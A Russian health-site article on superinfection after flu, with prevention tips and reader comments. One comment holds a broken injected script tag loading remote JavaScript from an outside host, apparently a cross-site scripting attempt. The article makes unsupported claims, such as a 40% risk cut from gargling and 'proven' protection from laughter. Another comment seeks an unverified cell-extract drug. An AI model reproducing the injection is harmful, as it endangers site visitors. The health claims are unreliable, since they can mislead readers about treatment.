Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Иммунитет. Что такое супе...  >>  Иммунитет. Что такое суперинфекция и как ее лечить
 
Обратная связь
 

Иммунитет. Что такое суперинфекция и как ее лечить

Размер шрифта
16 февраля 2011 00:01
  • google_analytics: false
  • Нравится

Иногда случается такая неприятность: «подхватили» грипп или ОРВИ, поболели-полечились и вроде бы уже почти выздоровели, как вдруг – подскочила температура, появился озноб, потом кашель… И болезнь возвращается снова, да еще в более тяжелой форме! Это так называемая суперинфекция, повторное заражение. Каков механизм этого явления и можно ли его предотвратить?

Елена Орлова/ «Здоровье-Инфо»

Что такое?

Бесконтрольное применение антибиотиков способствует развитию дисбактериоза: в кишечнике уменьшается количество бифидобактерий, нарушается нормальная микрофлора. Это снижает сопротивляемость организма и повышает риск развития суперинфекции. Поэтому курс антибиотиков может назначить только ваш лечащий врач, а ни в коем случае не вы сами по рекомендации знакомых или аптечной рекламы.

Суперинфекция возникает на фоне незавершившегося инфекционного заболевания, вызванное другим микроорганизмом, обычно устойчивым к лекарственному веществу, которое применялось для лечения первичной инфекции. Возбудителем новой инфекции может быть один из тех микроорганизмов, которые в норме являются безвредными обитателями человеческого организма, но становятся патогенными (то есть вредоносными) после того, как другие микроорганизмы погибают или ослабевают из-за приема лекарств

Бывает и так, что атакуемые лекарственными препаратами бактерии и вирусы являются устойчивой разновидностью возбудителя первичной инфекции, и после некоторого шока от лекарственной атаки они делаются еще более агрессивными, набрасываясь на организм с новой силой.

Есть и еще один фактор риска развития повторного заражения. В норме слизистая наших дыхательных путей покрыта защитным слоем. Но когда в организм проникает какой-то вирус (например, вирус гриппа), он первым делом разрушает этот защитный слой. На незащищенную слизистую могут попасть другие вирусы и микробы – и так разовьется вторичная инфекция. Именно поэтому чаще всего суперинфекция поражает органы дыхательной системы, где слизистой оболочки больше всего. Например, вслед за гриппом довольно часто возникает пневмония.

Группа риска

Суперинфекции наиболее подвержены люди со сниженным по тем или иным причинам иммунитетом.

  • В первую очередь – дети. Это связано с физиологическими особенностями развития иммунитета, - он формируется только с возрастом.
  • Пожилые люди. После 65 лет происходят возрастные изменения активности иммунной системы.
  • Страдающие каким-либо врожденным или приобретенным заболеванием, связанным со снижением иммунитета, - например, сахарным диабетом, болезнями сосудистой системы и т.п.

Предотвратить и не допустить

Отличный эффект для укрепления иммунитета дают травяные чаи и отвары. Вот один из самых действенных рецептов. Взять в равных пропорциях траву сушеницы топяной, мелиссы, душицы, пустырника, корень валерианы, шишки хмеля, цветы липы и семена кориандра. Заварить сбор крутым кипятком в предварительно ошпаренном чайнике или термосе из расчета 1 ст. л. (с верхом) на 0,5 л воды. Настаивать 1,5-2 часа, принимать 2-3 раза в день по желанию. Помимо укрепления иммунитета такой чай помогает бороться с аритмией, учащенным сердцебиением и спазмами сосудов.

Поскольку возникновение суперинфекции напрямую связано с иммунной системой, самый прямой путь к крепкому здоровью – укрепление иммунитета. Уточним, что иммунитет у нас как бы «двуслойный»: специфический и неспецифический. Первый слой мы получаем по наследству, вместе с генами родителей, а второй - неспецифический - вырабатываем сами в течение всей жизни, потому что вирусы постоянно мутируют, и наш организм вынужден отражать их атаки, постоянно перестраивая свою сложную систему защиты. Наш долг – всемерно помогать своему организму формировать стойкий иммунитет. Ради своего же блага.

Укрепление иммунитета – в целом дело несложное. Достаточно выполнять простейшие правила, однако делать это нужно регулярно и постоянно - в течение всей жизни.

  • Ежедневно бывайте на свежем воздухе. Просто выйти на балкон недостаточно: для повышения иммунитета нужно активно двигаться, давать организму определенную нагрузку. Старайтесь пройти быстрым шагом хотя бы пару километров в день.
  • Отличный способ «поднять» иммунитет - занятия спортом, фитнесом, танцами.
  • Закаливайтесь. Но помните: первое правило закаливания - это постепенность. Любые резкие шаги вроде обливания холодной водой могут привести не к оздоровлению, а к простуде. Контрастный душ для повышения и укрепления иммунитета тоже хорош, но опять же – начинать нужно с малых разниц температур и постепенно, в течение 10-14 дней, делать воду все более контрастной.
  • Ешьте натуральную, богатую витаминами и антиоксидантами пищу. Не забывайте о фруктах, кисломолочных продуктах, прежде всего живые йогуртах и кефире. Они заселяют желудочно-кишечный тракт полезными бактериями. Фитонциды, содержащиеся в репчатом луке и чесноке, помогут бороться с болезнетворными вирусами.
  • Если чувствуете себя неважно, используйте иммуномодуляторы. Постоянно «сидеть» на иммуностимулирующих средствах не стоит, но помочь своему организму в трудное время не возбраняется. Задача иммуностимуляторов - временно поддержать защитные силы организма, а не заменить их. Укрепляют иммунитет настойки шиповника, эхинацеи, женьшеня, элеутерококка, китайского лимонника. Перед применением обязательно изучите инструкцию, у этих препаратов есть противопоказания.
  • Старайтесь чаще мыть руки, особенно в «вирусный» сезон.
  • Медики подтверждают: превосходное средство укрепления иммунитета – это смех и… любовь. Веселитесь, смейтесь, черпайте положительную энергию большой ложкой, целуйтесь, занимайтесь сексом с любимым человеком – и никакая зараза к вам не пристанет. Это подтвержденный наукой факт!

Если вы все-таки заболели – правила ужесточаются!

  • Обязательно обратитесь к врачу, - необходимо знать точный диагноз и правильно лечиться. Самолечение в большинстве случаев оказывается безответственным решением, продиктованным леностью.
  • Ни в коем случае не принимайте антибиотики без назначения врача!
  • 3 раза в день полощите горло солевым раствором, - это на 40% снижает риск развития суперинфекции.
  • Смазывайте слизистую оболочку полости носа кунжутным, оливковым или растительным маслом. Это смягчит слизистую, сделает ее более эластичной и снизит вероятность проникновения вирусов и микробов.
  • Включите в ежедневный рацион йогурты и другие молочнокислые продукты с пробиотическими добавками, - пробиотики активизируют иммунную систему.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:20

Комментарий удален за нарушение Правил общения

3 - Гость

03 декабря 2015 в 20:39

Цитировать   |   Пожаловаться

Почитайте определение суперинфекции на википдии хотябы. В статье допущены ошибки, в т.ч. логические

4 - Инга1980

27 ноября 2016 в 00:37

Цитировать   |   Пожаловаться

Здравствуйте, помогите найти распростронителей препарата - трофосан называется. Он для востановления иммунитета, клеток внутренних органов, крови после тяжелых болезней и операций. И для поддержки иммунтета. Трофосан для чернобыльцев делали в 88-году для восстановления после аварии. Только он мне помог восстановить мои органы и кровь после ошибок молодости худения алкоголя болезней. Одна баночка ко мне случайно попала без Этикетки. Я не знаю толком его состав слышала только что для него используют вытяжку живых клеток с животных (до года) типа плазмы или стволовых клеток а мед просто как консервант. Очень много подделки. Знаю что оригинальный препарат в Ставрополе продают производитель (на крышке)  - БИОКОМ (Симферополь). Может кто еще пользовался и знает где купить.  Заранее спасибо. Пишите в личку или на здесь на сайт.

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.